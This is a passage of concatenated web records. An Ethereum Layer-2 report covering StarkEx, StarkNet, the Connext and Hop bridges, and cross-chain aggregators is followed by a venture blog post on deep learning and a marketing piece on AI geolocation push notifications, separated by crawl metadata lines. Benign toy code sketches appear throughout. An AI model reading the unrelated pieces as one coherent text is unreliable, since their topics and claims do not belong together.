in native Rust.
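The state commitment described in the preceding paragraphs, where Layer-2 accounts are leaves of a Merkle tree and only the root hash is posted to Layer-1, can be illustrated with a short toy sketch. This is only a sketch of the general idea; production rollups use sparse Merkle trees and circuit-friendly hash functions rather than SHA-256 over ad-hoc byte strings.

```python
import hashlib

def h(data: bytes) -> bytes:
    return hashlib.sha256(data).digest()

def merkle_root(leaves: list[bytes]) -> bytes:
    """Root hash of a (toy) binary Merkle tree built over the account leaves."""
    level = [h(leaf) for leaf in leaves]
    while len(level) > 1:
        if len(level) % 2:                 # duplicate the last node on odd-sized levels
            level.append(level[-1])
        level = [h(level[i] + level[i + 1]) for i in range(0, len(level), 2)]
    return level[0]

# Accounts encoded as toy leaves: "address:balance"
accounts = [b"0xA:100", b"0xB:250", b"0xC:40", b"0xD:7"]
root_before = merkle_root(accounts)

# A single balance change produces a different root; this is the kind of
# commitment that the Layer-1 contract checks a validity proof against.
accounts[1] = b"0xB:200"
root_after = merkle_root(accounts)
print(root_before.hex() != root_after.hex())   # True
```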
Starkware is a company that is focused on improving scalability and privacy for blockchains by using STARK technology to deploy and verify zero-knowledge proofs. For the scope of this report, the two following products developed by StarkWare will be addressed: StarkEx, and StarkNet. StarkEx is an Ethereum Layer-2 scalability solution developed by StarkWare that relies on validity proofs (STARKs) and is able to operate in two different modes: zkRollup or Validium. These modes of operation vary in terms of data-availability, due to this, they represent tradeoffs between security and costs. While using the zk-rollup mode, the required data that is necessary to recover Layer-2 balances (stored within the state Merkle Tree), is published on-chain as calldata. This process is enforced by the Cairo program (a general and Turing complete language developed for STARKs), which provides as an output the complete list of differences of the user’s balances from the previous states. As a result, the zk-rollup mode is trustless and all the required data that is necessary to access funds through Ethereum is available on-chain. Alternatively, while using the Validium mode, the data that is necessary to recover Layer-2 balances is published off-chain to trusted parties that are known as committee members. New state updates are only accepted as valid if the availability verifiers reach a quorum and sign the state update. The main advantage of Validium when compared to the zk-rollup mode is that there are no gas costs associated with transaction calldata; as such, a state update only spends gas to verify the corresponding proof. Similar to zkPorter, the off-chain actors that are responsible for all data availability can freeze (but not steal) the user’s funds if the majority colludes. All applications built on StarkEx, define their own business model and run on the StarkEx Service thus creating a diverse design space for the application layer. In fact, applications such as ImmutableX, go to the extent of not charging minting fees on NFTs. Table 4 shows the applications that are currently live on StarkEx and their respective metrics. |Total Value Locked |Sports NFT Game On zk-rollup mode, users submit transactions that are batched by the StarkEx Service (off-chain component responsible for batching and coordination). Upon creating a batch of transactions, this service sends the batch to a shared proving service termed SHARP. The proving service is then able to generate a validity proof for the batch. Once the proof for the batch is generated, SHARP sends the STARK proof to the STARK Verifier for verification. The service then sends an on-chain state update transaction to the StarkEx Contract, which will be accepted only if the verifier finds the proof valid. On Valium mode, users submit transactions that are batched by the StarkEx Service. Upon creating a batch of transactions, the StarkEx service sends the batch to SHARP thus generating the validity proof for the batch. Akin to the zk-rollup mode, the proving service sends the STARK proof to the STARK Verifier for verification, however, instead of sending an on-chain state update transaction to the StarkEx Contract, the StarkEx service sends the state update. Volitions break the Validium versus zk-rollup dichotomy by creating a hybrid solution that allows each user to pick one of both modes at an individual transaction level. 
As such, the volition approach creates a spectrum of data-availability that grants flexibility to all shareholders according to their priorities. With Volitions, users that prioritize low costs can use the Validium mode, while DeFi protocols that prioritize security can deploy contracts on zk-rollup mode. Furthermore, exchanges such as DeversiFi may opt to rely on off-chain data-availability solutions, such as Validiums to protect the privacy of its customers (e.g. professional traders), while other users prioritize security and therefore use the zk-rollup mode. The StarkEx scalability solution relies on the following components: - StarkEx Service – This off-chain component is responsible for batching and coordinating transactions. The service sends the batch of operations to the proving service which generates the correspondent validity proof. Once the proof is verified, it publishes the new state; - SHARP – Shared proving service for Cairo programs that receives proof requests from different applications and outputs proofs to attest to the validity of Cairo executions; - Stark Verifier – On-chain component that receives a validity proof associated with an update and verifies that the proof is valid; - StarkEx Contract – Responsible for state updates and the non-custodial management of deposits and withdrawals; - Cairo – A Turing-complete language for generating STARK proofs for general computation; StarkNet is a decentralized and permissionless Validity-Rollup that relies on STARK technology (e.g. provers and verifiers) to scale Ethereum on Layer-2. This ZK-Rollup solution (which is currently under development) supports general computation over Ethereum and is based on the Turing-complete Cairo language. Furthermore, StarkNet will expand beyond Rollups and it will become a Volition that supports Validium mode for off-chain data-availability. As such, users will be offered a hybrid solution that allows them to opt between security and cost tradeoffs at an individual transaction granularity. StarkEx was an important step towards the development of StarkNet, oversimplifying its structure, it is possible to claim that StartNet has a similar architecture to StarkEx with the exception that it supports arbitrary contract execution and additional bridges. Furthermore, StarkEx represents a standalone system for exchanges that uses the STARK proof system in order to provide scalability. Contrastingly, StarkNet is a general-purpose system for the deployment and interaction of contracts just like Ethereum. Akin to StarkEx, all transactions on StarkNet will be periodically batched with their validity proven in a STARK proof which is verified on Ethereum. Considering that all StarkNet state transitions will be STARK-proven, only valid transactions will be accepted on Ethereum. Initially, all the required data to reconstruct the full StarkNet state will be published on-chain (zk-rollup mode), furthermore, anyone will be able to run a StarkNet node thus ensuring that StarkNet is permissionless and secure. It is important to note that contrary to the present Layer-1 paradigm, StarkNet will decrease its cost per transaction as the network scales. StarkNet’s roadmap is given as follows: - Single-App Rollups – This represents the first step of StarkNet’s roadmap. 
At this stage each StarkNet instance will support and run single applications; - Multi-Apps Rollups – At this point, each StarkNet instance will be able to run multiple applications thus supporting cross-application interoperability by accessing the same global Layer-2 state; - Decentralized Rollup – This constitutes the final stage of StartNet’s development where the platform becomes fully decentralized and permissionless; StarkNet Alpha was released on a public testnet in June 2021, since then, the testnet has been upgraded twice. The Alpha 1 release included on-chain data-availability and a cross-layer messaging protocol. As such, powered by validity proofs, new forms of interoperability between Layer-1 and Layer-2 are now possible. The Alpha 2 release, on the other hand, enabled composability, as a result, StarkNet Alpha is now able to support interaction between smart contracts. The next stage for StarkNet’s development starts with the Alpha release on Mainnet. Similar to Optimism, StarkNet will follow a permissioned approach to smart contract deployments where an initial whitelisting will take place. Additionally, new ecosystem efforts such as Warp, a Solidity to Cairo compiler, standardized contracts (developed by Open Zeppelin), and a StarkNet explorer termed Voyager are currently under development. Ethereum’s rollup-centric roadmap represents the next evolutionary step in terms of scalability; however, to preserve composability and mitigate fragmented liquidity, Layer-2 solutions will require interoperability bridges. These bridges are essential to establish cross-rollup transfers, communication, and to avoid the high exit times that are inherent to optimistic rollups. Different bridge designs offer different tradeoffs (e.g. security, speed, and capital efficiency), due to this, each use case needs to be adapted and contextualized with the existing tradeoffs. Given the scope of this report on EVM-focused solutions, Hop protocol and Connext will be addressed due to the trustless characteristics that grant them the same security as the underlying base layer. Connext is an interoperability bridge based on a trustless network of state channels that enables cross-chain transactions of value and calldata. Due to its design, all transactions conducted on Connext have the same security as the underlying chain. Within this network, there are state channel nodes, termed routers, that act as liquidity providers and front liquidity on the receiving end whenever a transaction takes place. Unlike other interoperability bridges, Connext doesn’t create representative assets nor does it incur any Layer-1 costs while conducting cross-rollup transactions. Connext routers can be seen as state channel nodes that automatically forward all in-channel transfers that are sent to it. As such, for a cross-chain transaction, the Connext router will be responsible for transferring funds in-channel to the destination chain in exchange for funds on the origin chain. In order to incentivize routers and to cover the existing expenses (e.g. server and transaction costs), there are fees (static or dynamic) that are applied to all transactions. Considering that Connext relies on state channels, transfers are atomic and therefore trustless. Furthermore, the protocol also supports arbitrary conditionality, as such, it is possible to pass calldata in order to execute contract interactions. Figure 6 represents an oversimplified architecture of Connext’s network. 
To illustrate how cross-chain transactions work on Connext consider the following example where user A wants to transfer 1000 DAI from Arbitrum to Optimism: - User A is matched with a Connext router (that will front liquidity on the destination rollup) thus opening a state channel between both on the origin rollup; - The router verifies that user A has opened a state channel on the origin rollup and proceeds to open another state channel by locking the same amount of funds (minus fees) on the destination rollup; - User A signs a commitment transaction and shares it with the router off-chain thus ensuring that it has the secret without revealing it, this ensures the router that it is possible to unlock funds on the origin chain with the correct secret; - The router proceeds to create a commitment transaction that unlocks funds on the destination rollup with user’s A secret; - User A unlocks funds on the destination rollup using its secret and the router’s commitment transaction, by doing so, the user reveals its secret on-chain; - The router can now unlock the funds on the origin rollup with the user’s secret and the commitment transaction thus settling the transaction; The previous example can be summarized by stating that the Connext router provides funds on the destination rollup in return for the same funds plus a fee on the origin rollup. The only bottleneck that exists within this architecture is the available liquidity. Considering that a given router has mainly unidirectional transactions, it is possible to conclude that the available liquidity will quickly become unbalanced. To mitigate this issue, Connext developed virtual AMMs that incentivize arbitrageurs to make transactions in the direction that rebalances the existing liquidity within Connext’s network of routers. Lastly, it is important to note that Connext was started in 2017 and its team has been a core part of the Layer-2 research community since the deployment of the first general-purpose payment system in 2018. As such, the work that has been developed by the team on state channel systems reflects several years of experience and iterations that ultimately led to Connext’s current bridge design for cross-rollup interactions. Hop protocol is a cross-rollup general token bridge that enables fast and cost-effective transactions between different rollups and the Ethereum base chain. Structurally, the protocol can be segmented into three different parts: Bonders, cross-network bridge tokens, and Hop’s Automatic Market Maker. Bonders are third-party entities that provide upfront liquidity for swaps at the destination chain, the cross-network bridge token is used to transfer assets between different rollups (or to claim the underlying asset on the Ethereum mainnet), and the AMM is used to swap between bridge tokens and the rollup token representation. Furthermore, Hop’s AMM enables a dynamic pricing of liquidity and its respective rebalancing across the network. Hop bridge tokens (i.e. hAssets) are intermediary assets that exist within Hop Protocol to facilitate cross-rollup transactions. In order to mint hAssets, it is necessary to deposit the corresponding asset into the Layer-1 Hop bridge contract (e.g. 1000 USDC deposit on Layer-1 can mint 1000 hUSDC on a Layer-2 Hop bridge contract). As a result, hAssets have a 1:1 collateralization. While redeeming hAssets the same logic is applied. The Hop bridge token is burnt on Layer-2 and the underlying asset is unlocked on Layer-1. 
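The secret-and-commitment exchange in the Connext walkthrough above is essentially a hashlock: funds on each side can be unlocked only by whoever knows the preimage of an agreed hash, and claiming on the destination rollup reveals that preimage for the origin rollup. The Python sketch below is a heavily simplified, off-chain illustration of that idea; it is not Connext's actual state-channel contracts or API, and while the 1000 DAI amount comes from the example, the 1 DAI router fee is an assumed placeholder.

```python
import hashlib, secrets

def sha256(data: bytes) -> bytes:
    return hashlib.sha256(data).digest()

class HashlockedTransfer:
    """Toy model of funds locked against a hash, claimable with the preimage."""
    def __init__(self, amount: float, hashlock: bytes):
        self.amount = amount
        self.hashlock = hashlock
        self.claimed = False

    def claim(self, preimage: bytes) -> bool:
        if not self.claimed and sha256(preimage) == self.hashlock:
            self.claimed = True
            return True
        return False

# 1. User A generates a secret and shares only its hash with the router.
secret = secrets.token_bytes(32)
hashlock = sha256(secret)

# 2. Locks exist on both chains: A's funds on the origin rollup, and the
#    router's fronted liquidity (minus an assumed fee) on the destination rollup.
origin_lock = HashlockedTransfer(amount=1000.0, hashlock=hashlock)            # A -> router
destination_lock = HashlockedTransfer(amount=1000.0 - 1.0, hashlock=hashlock)  # router -> A

# 3. A claims on the destination rollup, revealing the secret in the process.
assert destination_lock.claim(secret)

# 4. The router reuses the now-public secret to settle on the origin rollup.
assert origin_lock.claim(secret)
```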
Liquidity Bonders provide upfront liquidity on the destination rollup in exchange for a fee. To do so, Bonders are required to run full verifier nodes on rollups in order to facilitate cross-rollup transactions. This technical requirement allows Bonders to check whether users have burnt the necessary hAssets on the origin rollup. Once that criterion is met, Bonders proceed to lock up collateral that makes them eligible to mint and use hAssets on the destination rollup. When exchanging Hop bridge tokens between different rollups, Hop protocol mints a hAsset on the destination rollup and burns it on the origin rollup. In order to execute a quick cross-rollup transfer of assets, the protocol relies on a third party called a "Bonder" that provides upfront liquidity on the destination rollup in exchange for a fee. Once the transfer has propagated through Layer-1, the Bonder's liquidity is returned. To illustrate how cross-rollup transfers work on Hop protocol, consider the following example:
- USDC is swapped for hUSDC through Hop's AMM on Rollup 1;
- Using the Hop Bridge, the protocol sends hUSDC from Rollup 1 to Rollup 2;
- The Bonder provides upfront liquidity for hUSDC on Rollup 2;
- hUSDC is swapped for USDC through Hop's AMM on Rollup 2.
Connext versus Hop Protocol
Hop protocol and Connext are trustless interoperability bridges that adopt 1:1 swaps instead of any-to-any swaps; as such, both protocols optimize for capital requirements and sacrifice flexibility for users. This approach ensures that Connext and Hop have bridge designs that allow them to remain highly scalable. In terms of capital efficiency, Connext is better positioned than Hop protocol because Hop requires active liquidity for Bonders and passive liquidity for its AMM pools, distributed among all chains connected by the protocol. Furthermore, Hop protocol leverages arbitrary messaging bridges (AMBs) to send funds between chains, so Bonders are required to lock their liquidity while the transaction is passed through the AMB (rollups require 1 day). Connext routers, on the other hand, only require exit liquidity with no lockups; as such, Connext is more capital efficient. It is worth noting that passive liquidity can be easily sourced by incentivizing AMM pools with liquidity mining programs. Because Connext relies on off-chain state channels, the protocol is able to settle transactions directly on Layer-2; as a result, while transacting assets between Layer-2 solutions, the system only spends gas on Layer-2. Conversely, all transactions on Hop protocol are required to be bonded on the Ethereum Layer-1. Since the protocol bundles a high number of transactions, it is still highly gas efficient. With regard to liquidity rebalancing and the pricing of swaps, Hop protocol relies on its AMM pools to determine swap rates and to reallocate liquidity within the network through arbitrage incentives that counteract unidirectional flows of liquidity. Alternatively, Connext routers charge a flat fee for each transaction and rebalance liquidity within the network manually. This system will be upgraded with the introduction of a virtual AMM that allows routers to price cross-chain transactions based on the available liquidity. As a result, arbitrageurs will be incentivized to profit by reallocating liquidity within Connext's network of routers. Both Connext and Hop protocol are trustless and non-custodial bridges that prioritize security.
Connext relies on state channels that do not publish data on the base layer; due to this, the main trust assumption made by the protocol is data availability. This liability can be mitigated by storing off-chain states and monitoring the underlying base layer in order to resolve withdrawal disputes if one party is dishonest. In Hop's case, the protocol inherits the security of rollups (e.g. Arbitrum) and, therefore, the security of the underlying Ethereum Layer-1. For transactions between sidechains, users are exposed to weaker security when compared to the Ethereum Layer-1; nevertheless, this vulnerability is contained within that network without compromising the system as a whole. In summary, both interoperability bridges prioritize security, fast swaps, and short-tail assets. Due to its design, Hop protocol is optimal for rebalancing liquidity and smart contract applications; Connext, on the other hand, is more capital efficient. Lastly, it is important to note that Hop transfers can be initiated by smart contracts (this isn't possible with Connext); therefore, Hop's use cases can be expanded to cross-chain DEXs and other multi-chain applications.
Liquidity Layer – Tokemak
Interoperability bridges are the solution to the high exit times and costs that are intrinsic to optimistic rollups; however, the liquidity that is available for cross-chain transactions remains a limiting factor for the mainstream adoption of the Ethereum Layer-2 ecosystem. This limitation is particularly evident while transferring assets using Hop protocol. In fact, for each cross-chain transaction, a large part of the fees can be attributed to the price impact associated with the trade size, which occurs due to the limited liquidity available within Hop's pools. For that reason, it is still unfeasible to conduct large cross-rollup transactions. In order to overcome this limitation it is necessary to increase the liquidity available in interoperability bridges; this will provide cheaper cross-chain transactions for end users and catalyse the development of the Layer-2 ecosystem through improved trade execution, better composability, and unified liquidity. As a decentralized market-maker, Tokemak is uniquely positioned to overcome this obstacle and provide liquidity to interoperability bridges. With new liquidity mining programs being rolled out to incentivize the migration of capital from Layer-1 to Layer-2, there is an opportunity to establish symbiotic relationships between cross-chain bridge solutions and Tokemak that target long-term sustainable liquidity. In the particular case of Hop protocol and Connext, the following are sources of demand for Tokemak's liquidity:
- Bridge Reactors – These hypothetical reactors can provide liquidity to Hop's AMM pools with minimized impermanent loss risk (i.e. an unlikely deviation of the hAsset:Asset peg).
Furthermore, Tokemak can also provide liquidity to Hop Bonders and Connext Routers under the same assumption of no impermanent loss risks; - Arbitrage Reactors – With liquidity deployed on multiple layers, Tokemak is uniquely positioned to create arbitrage reactors that rebalance liquidity in exchange for profit, this would be particularly useful to correct unidirectional imbalances of liquidity within the Connext network of Routers; Cross-Chain Liquidity Aggregators The growing number of interoperability bridges that connect Layer-2 solutions, and the overall EVM ecosystem, creates a new demand for the best quotes over a vast spectrum of assets that exist on different platforms. Due to this, cross-chain liquidity aggregators that route users through the best interoperability bridges become necessary to ensure optimal quotes for cross-chain swaps. Additionally, by aggregating cross-chain DEXs, these liquidity aggregators enable any-to-any swaps. Projects such as MOVR Network and Li.Finance are cross-chain liquidity aggregators that offer this value proposition and facilitate the mass adoption of Layer-2 solutions by promoting user abstraction. MOVR Network is a cross-chain liquidity aggregator that allows users to move funds between different chains through optimal routes. The protocol achieves this value proposition by aggregating all DEXs and DEX aggregators within its architecture, by doing so, MOVR abstracts the decision making process from end users and optimizes transfers according to the following parameters: - Maximum output (ETH) on the destination chain; - Minimum GAS fee for swap and transfer; - Lowest Bridging Time; Upon ordering all available routes according to the aforementioned parameters, the user is able to decide between the fastest or cheapest routes according to personal preferences. Furthermore, the protocol also enables zero-cost cross-chain transfers through its peer-to-peer settlement layer which is incorporated in the system’s architecture. The following example illustrates a costless peer-to-peer transaction executed on the MOVR Network: - User A wants to transfer 1000 USDC from Rollup 1 to Rollup 2; - User B wants to transfer 500 USDC from Rollup 2 to Rollup 1; - MOVR settles 500 USDC between user A and B; - MOVR transfers the remaining 500 USDC from Rollup 1 to Rollup 2; Li.Finance is a cross-chain aggregator of liquidity networks that aims to facilitate the adoption of Layer-2 solutions by routing DeFi users through optimal cross-chain bridges. Structurally, the protocol can be segmented into three aggregation layers: cross-chain liquidity networks, lending protocols, and decentralized exchanges. The cross-chain liquidity network layer creates the required backend and frontend infrastructure to aggregate existing interoperability bridge solutions (e.g. Connext and Hop protocol), the lending protocol layer allows users to access more funds and leverage existing cross-chain arbitrage opportunities with flash loans (e.g. Aave and HiFinance), and the decentralized exchange layer enables cross-chain any-to-any swaps (e.g. Uniswap and ParaSwap). The protocol’s architecture prioritizes trustless and secure swaps thus allowing its users to find the fastest and most cost-effective routes for cross-chain swaps. For that purpose, Li.Finance splits transactions if required and it falls back to alternative liquidity networks if the best protocol isn’t available. Figure 9 shows Li.Finance architecture. 
As illustrated above, Li.Finance serves the following purposes:
- Aggregate cross-chain liquidity (e.g. stablecoin and native currency swaps);
- Connect to DEXs to enable any-to-any swaps;
- Connect to money markets to enable any-to-any loans;
- Make that liquidity mesh available through different layers and integrations.
The Ethereum rollup-centric roadmap marks the technological transition into a sustainable scalability model that outperforms all monolithic Layer-1 solutions and inverts the blockchain trilemma without compromising either security or decentralization. This can be achieved by adopting a modular architecture that segregates security, data-availability, and execution into different layers. As a result, Ethereum is now focused on becoming a platform for smart contract platforms that prioritizes both security and data-availability, and delegates the execution layer to an open design space where Layer-2 solutions can compete. For this vision to come to fruition, an extensive infrastructure stack needs to be developed. As such, it is necessary to prioritize the development and adoption of optimistic rollups, zk-rollups, interoperability bridges, and cross-chain liquidity aggregators. In the short term, optimistic rollups (e.g. Arbitrum and Optimism) represent the leading scaling solutions for the Ethereum ecosystem due to their existing advantages in terms of general-purpose EVM computation. This characteristic provides the composability that is required by the application layer. However, in the long term, zk-rollups will prove to be superior for all use cases once general-purpose computation is supported on mainnet. This transition to zk-rollups will naturally occur due to the higher throughput, lower transaction costs, and shorter withdrawal periods (without any trust assumptions) that characterize this type of rollup. Furthermore, zk-rollups will support composability and interoperability with off-chain data-availability solutions such as Validium and zkPorter. This approach constitutes a hybrid system that empowers users with an off-chain data-availability option representing a tradeoff between security and costs. It is worth noting that with this solution users can still interact with the zk-rollup mode that inherits Ethereum's security and data-availability. Additionally, this solution is still far more secure than sidechains because funds can be frozen (in the event of supermajority collusion) but never stolen. To ensure that Layer-2 preserves cross-rollup composability and a seamless flow of liquidity, it is necessary to adopt trustless interoperability bridges that prioritize security and connect siloed rollups. In this sector, Hop protocol and Connext represent the leading EVM-focused interoperability bridges that are non-custodial and therefore deemed sufficiently secure to be adopted. Moreover, cross-chain liquidity aggregators that enable any-to-any swaps and aggregate liquidity among different bridges will also become progressively more important as abstraction tools for end users. The capital migration from Layer-1 to Layer-2 will be incentivized with liquidity mining programs. Both interoperability bridges and rollups will launch native tokens in order to promote adoption and incentivize liquidity; as such, the next stage of incentives within DeFi will catalyse the transition to an ecosystem that is free from the limitations of the Ethereum Layer-1.
In summary, a modular architecture is the only sustainable approach to addressing scalability limitations. By separating the execution layer from the data-availability and security layers, it is possible to invert the blockchain trilemma and reduce transaction costs even as adoption increases. Furthermore, to create a functional ecosystem at the Layer-2 level, it is necessary to develop and adopt a core infrastructure stack composed of rollups, interoperability bridges, cross-chain liquidity aggregators, and a unified liquidity layer.
1. Optimism. (n.d.). Optimism Documentation. Retrieved September 22, 2021, from https://community.optimism.io/
2. Arbitrum. (n.d.). Arbitrum Documentation. Retrieved October 27, 2021, from https://developer.offchainlabs.com/docs/inside_arbitrum
3. zkSync. (n.d.). zkSync Documentation. Retrieved October 4, 2021, from
4. StarkWare. (n.d.). StarkEx Documentation. Retrieved October 8, 2021, from
5. Connext. (n.d.). Connext Documentation. Retrieved October 14, 2021, from
6. Whinfrey, C. (2021, January). Hop: Send Tokens Across Rollups.
7. Medium. (2021, October). Introducing FundMovr: Seamless Cross-Chain Bridging. Retrieved October 25, 2021, from
systems_science
https://www.weathergagecapital.com/news-insights/deep-dreams-2
2023-01-29T14:45:55
s3://commoncrawl/crawl-data/CC-MAIN-2023-06/segments/1674764499744.74/warc/CC-MAIN-20230129144110-20230129174110-00819.warc.gz
0.958183
1,256
CC-MAIN-2023-06
webtext-fineweb__CC-MAIN-2023-06__0__305990056
en
After sixty years of failed starts in AI, it appears that the tumblers are finally clicking and the breakthroughs are happening
@JBElsea @WeathergageTeam
In my previous blog A(l)chemical Reactions, I drew an arc between the medieval proto-scientific philosophy of alchemy and self-driving cars. The connection wasn't as tortured as one would think and it allowed me to get across two related ideas. First, important insights may come from unexpected places and be applied in unexpected ways to unexpected things. Second, it takes a while for all the technology tumblers to click into place, but when they do, breakthroughs happen and many previously locked doors fly off their hinges. Such a breakthrough may have taken place with artificial intelligence (AI) and, specifically, with a neural network-based approach called "deep learning". A few months ago, we had the pleasure of hearing Frank Chen, head of Research at Andreessen Horowitz, present an excellent primer on AI. But before you read Frank's thoughts, I'll attempt to synthesize a few of his points and why they matter.
Artificial intelligence is one of those buzzy, short-hand terms that is frequently used and just as frequently misunderstood. The misunderstanding is to be expected since AI has a lot of components and a complicated taxonomy. For instance, deep learning is a subset of machine learning, which itself is a subset of AI. In its simplest form, AI is a set of algorithms and techniques that allow computers to mimic human intelligence. How the mimicry is pursued, however, is where things get tricky because there are many approaches.
AI research began in the mid-1950's, some of it in response to the Cold War. The U.S. intelligence services didn't have enough Russian-speaking people to monitor the Soviets so they thought it would make sense to program computers to recognize and translate natural language. Turns out, natural language recognition is really hard, especially using 1950's technology, and after spending millions of dollars and a decade's worth of work, the effort was abandoned. There were later attempts at different AI applications—remember "expert systems" of the 1980's? — but the result was decades of AI boom-bust cycles. While the technology was undoubtedly improving, the improvements were insufficient to crack open the AI locks. But that was then and this is now. Maybe. After sixty years – that's right, sixty years – of failed starts in AI, it appears that the tumblers are finally clicking and the breakthroughs are happening.
What's changed? Pretty much everything. The original approach was for humans to teach the computer to mimic a human function. Researchers would create rules that described a behavior or speech, input the rules into the computer, and the computer would then produce human-like output. As we've seen, that didn't work out so well. Today's researchers are taking a totally different approach. They are applying neural networks – an idea from the 1940's – to model data structures that mimic the way the human brain processes information. I won't pretend to have more than a superficial understanding of the mechanism, but I think it works something like this: researchers feed massive amounts of data into very powerful computers, provide some algorithms to help the computers learn from the data, and then the computers use the data to basically teach themselves to mimic the targeted behavior.
This last bit is the subset of AI called "deep learning" and it is considered to be the primary contributor to the recent AI breakthrough. What else enabled this breakthrough? The same advances I talked about in my previous blog. Back in the day, compute was expensive, the data were sparse, and most of the research was buried inside government or corporate labs or done by small teams of underfunded academics. Not anymore.
Readers are already using products powered by AI, and have been for a while. If you've used Facebook or Amazon, watched movies on Netflix, read BuzzFeed, rented an AirBnb, or asked Siri a question, you've used some form of AI. And you've probably noticed that the products and services keep getting better and smarter all the time. (Check out Amazon's Echo if you haven't already—its logo should be a Trojan horse.) The semi-autonomous features of many new cars and trucks are powered by forms of AI, and more sophisticated applications will power the fully autonomous versions that will be on the road in the very near future. And AI is not just for consumer applications. Its constituents are already reading X-rays and diagnosing blood cancers at much higher rates of accuracy than human experts.
We believe that AI, and deep learning in particular, is another fundamental technological shift, and big changes are in store. Entrepreneurs and techy top guns are fully engaged, as are many venture capitalists. We expect that many of the AI winners will be venture-backed start-ups and that the biggest will be those who are doing something most people either haven't thought of or thought impossible. We can't wait!
P.S. About those images at the beginning of the blog. The first image is a beautiful photo of a night sky just outside Kruger Park in South Africa, taken by my partner, Tim Bliamptis. The second is the same image transformed by an AI algorithm called Deep Dream Generator. As the Deep Dream website explains, the algorithm was initially invented to help scientists and engineers see what a deep neural network is seeing when it is looking at a given image. Since then the algorithm has become a new form of psychedelic and abstract art. If you want to know even more about AI, check out Pedro Domingos's podcast. You can find it on the Farnam Street blog: https://www.farnamstreetblog.com/2016/09/pedro-domingos-artificial-intelligence/. Here's a shorter piece from IEEE Spectrum.
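For readers who want a feel for what "the computers teach themselves from data" means in miniature, here is a deliberately tiny, hedged illustration: a single artificial neuron learning the OR function by gradient descent. Real deep learning systems stack millions of such units and train on vastly more data; everything in this sketch, including the names, is my own simplification.
```java
/** A deliberately tiny "learning from data" demo: one neuron learns the OR function. */
public class TinyLearner {
    public static void main(String[] args) {
        double[][] inputs = {{0, 0}, {0, 1}, {1, 0}, {1, 1}};
        double[] targets =  {0, 1, 1, 1};                 // OR truth table: the "data" to learn from
        double w1 = 0, w2 = 0, bias = 0, learningRate = 0.5;

        // Repeatedly nudge the weights in the direction that reduces the prediction error.
        for (int epoch = 0; epoch < 5000; epoch++) {
            for (int i = 0; i < inputs.length; i++) {
                double z = w1 * inputs[i][0] + w2 * inputs[i][1] + bias;
                double prediction = 1.0 / (1.0 + Math.exp(-z));   // sigmoid activation
                double error = prediction - targets[i];
                w1   -= learningRate * error * inputs[i][0];      // gradient step
                w2   -= learningRate * error * inputs[i][1];
                bias -= learningRate * error;
            }
        }
        // After training, the neuron's outputs approximate the OR function it was shown.
        for (double[] x : inputs) {
            double p = 1.0 / (1.0 + Math.exp(-(w1 * x[0] + w2 * x[1] + bias)));
            System.out.printf("OR(%.0f,%.0f) ~ %.3f%n", x[0], x[1], p);
        }
    }
}
```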
systems_science
https://www.ngrow.ai/blog/navigating-geolocation-based-push-notifications-with-ai
2023-10-04T00:13:13
s3://commoncrawl/crawl-data/CC-MAIN-2023-40/segments/1695233511284.37/warc/CC-MAIN-20231003224357-20231004014357-00377.warc.gz
0.867465
667
CC-MAIN-2023-40
webtext-fineweb__CC-MAIN-2023-40__0__75019077
en
In the era of mobile technology and artificial intelligence (AI), the convergence of geolocation-based push notifications offers an unprecedented opportunity for personalized marketing. By harnessing AI-powered insights and user location data, businesses can deliver hyper-targeted messages that resonate with users in real-time physical contexts. Let’s delve into the synergy of geolocation-based push notifications and AI, exploring strategies and best practices to drive engagement, enhance user experiences, and optimize mobile marketing campaigns. The Power of Geolocation-Based Push Notifications Enhanced by AI Geolocation-based push notifications, when augmented by AI, transcend traditional marketing tactics. How? AI algorithms analyze user behavior, preferences, and historical data to tailor notifications based on not only location but also individual inclinations. This dynamic approach creates a seamless connection between the digital and physical worlds, enabling businesses to engage users with unprecedented precision. Strategies for Effective Geolocation-Based Push Notifications with AI - AI-Powered Segmentation: Utilize AI-driven data analysis to segment your user base according to location, behaviors, and preferences. This fine-grained segmentation enables personalized notifications that cater to specific interests and contexts. - Predictive Triggers: Employ AI algorithms to predict user movements and behaviors. By anticipating user actions, you can trigger notifications just as users enter a geofenced area, enhancing relevancy and engagement. - Behavioral Contextualization: Combine AI insights with geolocation data to understand user context better. Send notifications that align with users' current activities or intents, providing value and relevance. - Smart Content Recommendations: Leverage AI to recommend content, products, or services based on both user preferences and physical location. This approach maximizes the chances of user interaction. - Dynamic Personalization: Implement AI-powered dynamic content that adapts based on real-time data. For instance, a retail app could dynamically update a notification to showcase the nearest store's available products. Best Practices for Geolocation-Based Push Notifications Enhanced by AI - AI-Backed Personalization: Ensure AI-driven personalization enhances the user experience rather than intruding on privacy. Strive for a delicate balance between personalization and user comfort. - Real-Time Adaptation: Leverage AI to adjust notifications in real time based on user responses or changing circumstances, maintaining relevance and avoiding annoyance. - A/B Testing with AI Variants: Use AI-driven A/B testing to refine your geolocation-based notifications. Test different AI-generated content, timing, and triggers to optimize engagement rates. The fusion of geolocation-based push notifications and AI introduces a new frontier in mobile marketing. By integrating AI's cognitive capabilities with user location insights, businesses can create dynamic, contextually relevant interactions that resonate deeply with users. As you navigate this synergy, remember to uphold user privacy, prioritize personalized value, and continuously fine-tune your strategies through AI-driven optimization.
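As a purely illustrative companion to the predictive-trigger and geofencing ideas above, the sketch below shows the geometric core of a geofence check: computing the distance between a user and a point of interest and deciding whether a notification is even a candidate. The coordinates, radius and class names are assumptions for the example, not part of any particular vendor's API.
```java
/** Illustrative geofence check: is the user close enough to a store to trigger a notification? */
public class GeofenceTrigger {
    static final double EARTH_RADIUS_M = 6_371_000.0;

    /** Great-circle (haversine) distance in metres between two lat/lon points given in degrees. */
    static double distanceMetres(double lat1, double lon1, double lat2, double lon2) {
        double dLat = Math.toRadians(lat2 - lat1);
        double dLon = Math.toRadians(lon2 - lon1);
        double a = Math.pow(Math.sin(dLat / 2), 2)
                 + Math.cos(Math.toRadians(lat1)) * Math.cos(Math.toRadians(lat2))
                 * Math.pow(Math.sin(dLon / 2), 2);
        return 2 * EARTH_RADIUS_M * Math.asin(Math.sqrt(a));
    }

    public static void main(String[] args) {
        double storeLat = 40.7580, storeLon = -73.9855;   // hypothetical store location
        double userLat = 40.7599,  userLon = -73.9840;    // hypothetical user location
        double geofenceRadiusM = 300;

        if (distanceMetres(userLat, userLon, storeLat, storeLon) <= geofenceRadiusM) {
            // In a real system, segmentation and AI scoring would then decide whether
            // this particular user should receive this particular message right now.
            System.out.println("User entered geofence: candidate for a push notification");
        } else {
            System.out.println("User outside geofence: no notification");
        }
    }
}
```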
systems_science
